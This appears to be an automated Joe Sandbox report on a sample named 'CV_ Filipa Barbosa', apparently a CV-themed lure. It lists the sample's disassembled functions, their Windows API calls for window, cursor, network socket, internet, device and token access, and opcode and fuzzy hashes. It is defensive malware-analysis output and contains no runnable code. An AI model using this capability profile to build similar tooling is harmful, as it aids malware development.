Part of subcall function 00335F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00335F6F
Part of subcall function 00335F55: GetCurrentThreadId.KERNEL32 ref: 00335F76
Part of subcall function 00335F55: AttachThreadInput.USER32(00000000,?,0033781F), ref: 00335F7D

GetCaretPos.USER32(?), ref: 00357CCA
ClientToScreen.USER32(00000000,?), ref: 00357D03
GetForegroundWindow.USER32 ref: 00357D09

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d2db239db637dccddc502ec1e57bc13c233c585459673410443e9f74a8eb2708
Instruction ID: 5f81babc033a9c822609c96603035b41ca561ad3d921abc77ce28904b63e7188
Opcode Fuzzy Hash: d2db239db637dccddc502ec1e57bc13c233c585459673410443e9f74a8eb2708
Instruction Fuzzy Hash: D531FF71900108AFDB11EFA5D8859EFBBFDEF54314F108466E815E7251DA319E45CBA0

Function 0035F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

GetCursorPos.USER32(?), ref: 0035F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0036E4C0,?,?,?,?,?), ref: 0035F226
GetCursorPos.USER32(?), ref: 0035F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0036E4C0,?,?,?), ref: 0035F2A6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 1c7d102b798d9451276a7ceb735b21acabe298644fe7dfe418eba91403e87593
Instruction ID: 0caa2dfc323d1d0b261038d9ed064d1ae5c7b63c6568d7b2cbcfc82d083e1377
Opcode Fuzzy Hash: 1c7d102b798d9451276a7ceb735b21acabe298644fe7dfe418eba91403e87593
Instruction Fuzzy Hash: F721A07D500018AFCB278F94C858EEABBB9EF4A721F148469FD094B2B1D3309990DB90

Function 0034431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00344358

Part of subcall function 003443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00344401
Part of subcall function 003443E2: InternetCloseHandle.WININET(00000000), ref: 0034449E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 792102390dc16c9293ae129450f3378ebe0da7d2b667810eed8b1563aacb37bf
Instruction ID: 2297ee69fad20b9be22ab7a77c6306df39163ad146f1d60da2fa33f2967726c4
Opcode Fuzzy Hash: 792102390dc16c9293ae129450f3378ebe0da7d2b667810eed8b1563aacb37bf
Instruction Fuzzy Hash: 6B21A47A200605BBDB179F609C01F7BB7EDFF44B10F14402ABA159A550D771A861AB90

Function 00358A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00358AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00358AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00358ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00358ADC

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 1206c5385fee336c2afe977308ac32d0bc86534c3a34400a0994bcebd93b60e1
Instruction ID: fc3461c1b4f1f7f448337c4eeb1cea40729f9c581bbf25d0b785622b671cbf53
Opcode Fuzzy Hash: 1206c5385fee336c2afe977308ac32d0bc86534c3a34400a0994bcebd93b60e1
Instruction Fuzzy Hash: FE11D331255115AFD716AB18CC05FBAB7ADBF85321F18411AFD1ADB2E2CF70AC548B90

Function 00348A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00348AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00348AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00348AFF
WSAGetLastError.WSOCK32(00000000), ref: 00348B16

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: f05c2af29a659c9ce9952d8274b92c0a42210d975e69c8696afdf2f4dd784827
Instruction ID: 672a2b7071d91fc76cb1bc2cadfba1ab5bf7b743ae9723fb89f343d422e6e7f6
Opcode Fuzzy Hash: f05c2af29a659c9ce9952d8274b92c0a42210d975e69c8696afdf2f4dd784827
Instruction Fuzzy Hash: E9216671A001249FC726DF69C895A9EBBFCEF49350F00816AF849EB291DB7499858F90

Function 00330AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00331E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00330ABB,?,?,?,0033187A,00000000,000000EF,00000119,?,?), ref: 00331E77
Part of subcall function 00331E68: lstrcpyW.KERNEL32(00000000,?,?,00330ABB,?,?,?,0033187A,00000000,000000EF,00000119,?,?,00000000), ref: 00331E9D
Part of subcall function 00331E68: lstrcmpiW.KERNEL32(00000000,?,00330ABB,?,?,?,0033187A,00000000,000000EF,00000119,?,?), ref: 00331ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0033187A,00000000,000000EF,00000119,?,?,00000000), ref: 00330AD4
lstrcpyW.KERNEL32(00000000,?,?,0033187A,00000000,000000EF,00000119,?,?,00000000), ref: 00330AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0033187A,00000000,000000EF,00000119,?,?,00000000), ref: 00330B2E

Strings

cdecl, xrefs: 00330B25

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 775cc939d2c8d101e2211bcb207d1b1b99d916f4dc27d3398a5c46b19df972f3
Instruction ID: beb319285d720a4c5072d2bc67b348e408cd9af39f316d9404f453c4e5f71e28
Opcode Fuzzy Hash: 775cc939d2c8d101e2211bcb207d1b1b99d916f4dc27d3398a5c46b19df972f3
Instruction Fuzzy Hash: FC119636100305AFDB269F74DC95D7A77B8FF45354F81416AE806CB290EB71D950C7A0

Function 00322F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00322FB5

Part of subcall function 0031395C: __FF_MSGBANNER.LIBCMT ref: 00313973
Part of subcall function 0031395C: __NMSG_WRITE.LIBCMT ref: 0031397A
Part of subcall function 0031395C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000001,00000000,?,?,0030F507,?,0000000E), ref: 0031399F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6ae2343754f21910ab09f544b37c1434e0bbaea002b567460390d90af59c5140
Instruction ID: 05c95aa06fcb822d8a8e29c16f6f6e8f005e3231cdbeb589d030219698ca472a
Opcode Fuzzy Hash: 6ae2343754f21910ab09f544b37c1434e0bbaea002b567460390d90af59c5140
Instruction Fuzzy Hash: 3A11A731509221BBDB373B70BC056EA3BB8AF58360F258525F9499E161DB34C9809AE0

Function 0033058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003305AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003305C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003305DD
FreeLibrary.KERNEL32(?), ref: 00330632

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: fc14ea7bca2f7eebcd18576e1267b4e4b3046831a5bbc1e8fec06868bc1370dc
Instruction ID: dc0ef3663c875796d082a813322d0a530f75b105ad6e235ae7cd2f6e7b4db317
Opcode Fuzzy Hash: fc14ea7bca2f7eebcd18576e1267b4e4b3046831a5bbc1e8fec06868bc1370dc
Instruction Fuzzy Hash: E7219371900209EFDB26CF91DCEAADABBBCEF80700F00846DE51A96550D774EA95DF50

Function 00336713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00336733
_memset.LIBCMT ref: 00336754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003367A6
CloseHandle.KERNEL32(00000000), ref: 003367AF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 37a8e17aa0837842e6f83429abbb7895a83a40687015a8bbb9e2ee42a204b1ab
Instruction ID: 2e8eeac2aa11b1a579cbd62dbef4f1fff6492f07fd6dc16824923826a6a103d5
Opcode Fuzzy Hash: 37a8e17aa0837842e6f83429abbb7895a83a40687015a8bbb9e2ee42a204b1ab
Instruction Fuzzy Hash: AF11CA759012287AE73157A5AC8DFEBBABCEF44764F10419AF508E71D0D2744EC08B64

Function 0032B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0032AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0032AA79
Part of subcall function 0032AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0032AA83
Part of subcall function 0032AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0032AA92
Part of subcall function 0032AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0032AA99
Part of subcall function 0032AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0032AAAF

GetLengthSid.ADVAPI32(?,00000000,0032ADE4,?,?), ref: 0032B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0032B227
HeapAlloc.KERNEL32(00000000), ref: 0032B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0032B247

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 4e5f2e3a0d20380656df31720f5a18361a09b4a24e748b1b0f16d5cd998bdccd
Instruction ID: 5fe8603cda5b8fa518b2e0e9b8073dc52b935070d0613f99e4afdb016b4e3441
Opcode Fuzzy Hash: 4e5f2e3a0d20380656df31720f5a18361a09b4a24e748b1b0f16d5cd998bdccd
Instruction Fuzzy Hash: 6711CE71A00315EFCB1A9F98ED84AAEB7BDEF84304F14882DE94697210D731AE84CB10

Function 0032B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0032B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032B4DB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e28c84abc7309406fa8b20c469dbdec75524dcbc302e69c35840d160a94a5747
Instruction ID: f36348bb98b1340a8499e2af18bd260e654a12d0772a524c47aeb4bad81821ce
Opcode Fuzzy Hash: e28c84abc7309406fa8b20c469dbdec75524dcbc302e69c35840d160a94a5747
Instruction Fuzzy Hash: 6611487A900228FFDB11EFA9C881E9DBBB8FB08710F204091E604B7290D771AE10DB94

Function 0030B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0030B5A5
GetClientRect.USER32(?,?), ref: 0036E69A
GetCursorPos.USER32(?), ref: 0036E6A4
ScreenToClient.USER32(?,?), ref: 0036E6AF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: bf9a45c6b333b608d40d97c67e1d4e1ed30ce58afbffc2b85f3a6a4d8a4894d5
Instruction ID: 400499d0a7f30b0aa554319bc0b28317cacfa2d9b443ed3cce8f2cee552b5b30
Opcode Fuzzy Hash: bf9a45c6b333b608d40d97c67e1d4e1ed30ce58afbffc2b85f3a6a4d8a4894d5
Instruction Fuzzy Hash: 9911483590102ABFCB12DF94CC959EEBBBCEF0A305F500491F902E7180D334AA85CBA1

Function 0033732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00337352
MessageBoxW.USER32(?,?,?,?), ref: 00337385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0033739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003373A2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 951c9d9c1c759f5335e34c5196cbebee00fe07a281e8b37c082b14b517ca2e86
Instruction ID: c8ca4505a7f5e4ed32e84104d07be6ce948725df6ec5948c5414ca2e4f136f20
Opcode Fuzzy Hash: 951c9d9c1c759f5335e34c5196cbebee00fe07a281e8b37c082b14b517ca2e86
Instruction Fuzzy Hash: 3D1104B6A04214BFD7139BA8DC49ADE7BADAF48324F044315F925E32A1D7708D009BA0

Function 0030D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0030D1BA
GetStockObject.GDI32(00000011), ref: 0030D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0030D1D8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 6e24a2c751adc7fe00eecbddf09ead6c4d06d5096b3b7aa5e09c4a2e6431e4b4
Instruction ID: cc082bbd9ca5854636e73db8103c15abc4d2b73415c18b223bd8caa77b02de65
Opcode Fuzzy Hash: 6e24a2c751adc7fe00eecbddf09ead6c4d06d5096b3b7aa5e09c4a2e6431e4b4
Instruction Fuzzy Hash: 9F11AD72102549BFEB5B4F90DC60EEABBADFF08364F054105FA1556090CB31DCA0EBA0

Function 00324DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00324E16

Part of subcall function 003254F5: __fltout2.LIBCMT ref: 0032551E

__cftog_l.LIBCMT ref: 00324E3C
__cftoe_l.LIBCMT ref: 00324E6E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 8bdbe58a5d8b73550558282048052b205083da57c85c6b0f6737028e90e0be4e
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 3901493604015EBBDF135F84EC018EE3F27BB18350B5A8455FE2899035D336CAB2AB81

Function 00317452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00317A0D: __getptd_noexit.LIBCMT ref: 00317A0E

__lock.LIBCMT ref: 0031748F
InterlockedDecrement.KERNEL32(?), ref: 003174AC
_free.LIBCMT ref: 003174BF
InterlockedIncrement.KERNEL32(011627F0), ref: 003174D7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 8f7bf2f9f245e49290b33609e366512163d82cb74be294b0e3a2904f13275342
Instruction ID: 1881ba7204efb362269e278bc985c8f55d11ef1312371ba3ae7efbba04e29ed0
Opcode Fuzzy Hash: 8f7bf2f9f245e49290b33609e366512163d82cb74be294b0e3a2904f13275342
Instruction Fuzzy Hash: 5D018436909A11A7DB2BAFA698067DDBB74BF0D710F1E4005F4146B690CF2459C1CFD2

Function 0035EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0030AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0030AFE3
Part of subcall function 0030AF83: SelectObject.GDI32(?,00000000), ref: 0030AFF2
Part of subcall function 0030AF83: BeginPath.GDI32(?), ref: 0030B009
Part of subcall function 0030AF83: SelectObject.GDI32(?,00000000), ref: 0030B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035EA8E
LineTo.GDI32(00000000,?,?), ref: 0035EA9B
EndPath.GDI32(00000000), ref: 0035EAAB
StrokePath.GDI32(00000000), ref: 0035EAB9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
